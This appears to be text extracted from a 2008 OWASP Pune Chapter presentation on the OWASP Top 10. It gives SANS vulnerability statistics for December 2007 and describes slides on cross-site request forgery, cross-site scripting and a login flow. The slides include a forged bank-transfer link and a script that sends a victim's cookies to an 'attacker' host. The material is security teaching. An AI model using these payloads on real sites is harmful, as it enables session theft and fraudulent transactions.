Owasp Top 10 - Owasp Pune Chapter - January 2008
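- 2. SANS @RISK December 2007

  | Category | 3 Dec | 10 Dec | 17 Dec | 24 Dec | 31 Dec | Total |
  |---|---|---|---|---|---|---|
  | Microsoft Products | 2 | 3 | 12 | 0 | 2 | 19 |
  | Mac | 2 | 2 | 2 | 4 | 0 | 10 |
  | Linux | 10 | 5 | 8 | 11 | 0 | 34 |
  | Unix, Solaris, etc | 5 | 3 | 3 | 4 | 1 | 16 |
  | Network Device | 1 | 3 | 1 | 1 | 1 | 7 |
  | Others (various) | 31 | 33 | 30 | 37 | 16 | 147 |
  | Web Applications | 70 | 34 | 52 | 35 | 52 | 243 |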
- 25. [Diagram, steps 1-7. Parties: www.bank.com, Victim, Attacker. Labels: Logging Request; Auth Cookies; Legitimate Requests; Sends an email containing malicious href tag; Click Here; Transfer Money.] Link shown on the slide: <a href=http://www.bank.com/transfer.php?acc=attacker&amount=$10000>
- 41. [Diagram, steps 1-7. Parties: www.bank.com, Victim, Attacker. Labels: Logging Request; Auth Cookies; Legitimate Requests; Sends malicious request; Click Here; Stolen Cookies.] Script shown on the slide: <script>document.location="http://attacker/steal_cookies.php?cookies="+document.cookie</script>
- 81. [Diagram: Client and Server. Server-side labels: login.asp; authenticate.asp; Redirect request; logoff; homepage.asp.] Exchange, in the order shown on the slide: GET www.abc.com; www.abc.com/login.asp; POST username + password; Redirect: www.abc.com/homepage.asp; GET www.abc.com/homepage.asp; www.abc.com/homepage.asp